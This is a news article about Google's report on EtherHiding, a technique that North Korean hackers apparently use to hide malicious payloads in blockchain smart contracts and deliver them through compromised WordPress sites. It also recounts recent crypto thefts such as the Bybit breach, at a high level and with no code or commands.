Simply put
- Researchers from Google’s Threat Intelligence Group have identified North Korean hackers utilizing malware called EtherHiding.
- This malware allows for stealthy and untraceable delivery of malicious code through smart contracts.
- Pro-regime hackers have already siphoned off over $2 billion this year alone, largely from a hack involving the Bybit exchange.
Google’s Threat Intelligence Group has raised alarms about North Korea’s use of a blockchain-based malware named EtherHiding. This type of cyber operation, which supports cryptocurrency theft, is poised to make 2025 a notable year for illicit crypto-related activities.
According to Google, EtherHiding is actively exploited by hackers motivated by financial gain. The malware has been distributing tools for information theft since at least September 2023, marking its first documented use by a nation-state. It’s particularly resistant to conventional removal tactics.
“Traditional methods typically succeed by blocking known domains or IP addresses, but EtherHiding brings new challenges,” researchers noted. They also highlighted how smart contracts, like those on the BNB Smart Chain and Ethereum, can host this malicious software autonomously, making them hard to shut down and enabling subsequent stages of malware distribution.
While blockchain scanning tools can flag contracts as malicious, security experts contend that illicit activities can still occur.
North Korean hacking threat
This year, North Korean hackers have managed to steal in excess of $2 billion, primarily from a significant $1.46 billion breach of cryptocurrency exchange Bybit in February, as revealed in an October report by blockchain analytics firm Elliptic.
Additionally, North Korea has been linked to attacks on platforms like LND.fi and WOO, with intelligence agencies suggesting that these funds are funneled into the nation’s nuclear and missile programs.
The regime has demonstrated a wide array of tactics designed to infiltrate critical financial systems and extract sensitive corporate data. Their methods include social engineering, deploying malware, and sophisticated cyber espionage strategies. They even go so far as to create fictitious companies or dangle fake job offers to target developers.
Reported incidents indicate that North Korean hacking groups are hiring individuals who aren’t South Korean to pose as fronts, facilitating interviews with tech and cryptocurrency firms while disguising their true identities more effectively. Some attackers lure victims into fake video calls or podcast recordings, leading them to download malicious updates disguised as fixes or improvements.
Moreover, North Korean hackers are targeting traditional web infrastructure, having uploaded over 300 malicious code packages to the npm registry, a popular open-source platform used by countless developers to share and install JavaScript software.
How does EtherHiding work?
The integration of EtherHiding by North Korea traces back to February 2025, when Google reported its monitoring of UNC5342, a North Korean threat actor linked to the hacking group FamousChollima, which has started using this malware in its social engineering tactics.
EtherHiding employs a technique of embedding harmful code into smart contracts on public blockchains and targeting users through WordPress sites with small snippets of JavaScript injected into the code.
“When a user accesses a compromised site, a loader script executes in their browser,” Google researchers detailed. “This script then reaches out to the blockchain to retrieve the primary malicious payload stored remotely.”
They explained that the malware uses read-only function calls and avoids executing any transactions on the blockchain, effectively ensuring covert malware acquisition without incurring transaction fees. Once this payload is secured, it runs on the victim’s device. This can instigate a range of damaging actions, like displaying fake login interfaces, installing data-stealing malware, or even deploying ransomware.
The researchers emphasized that this evolution in tactics signifies a worrying trend among cybercriminals. “Essentially, EtherHiding marks a shift to a new generation of bulletproof hosting, where blockchain technology is being repurposed for malicious use.”
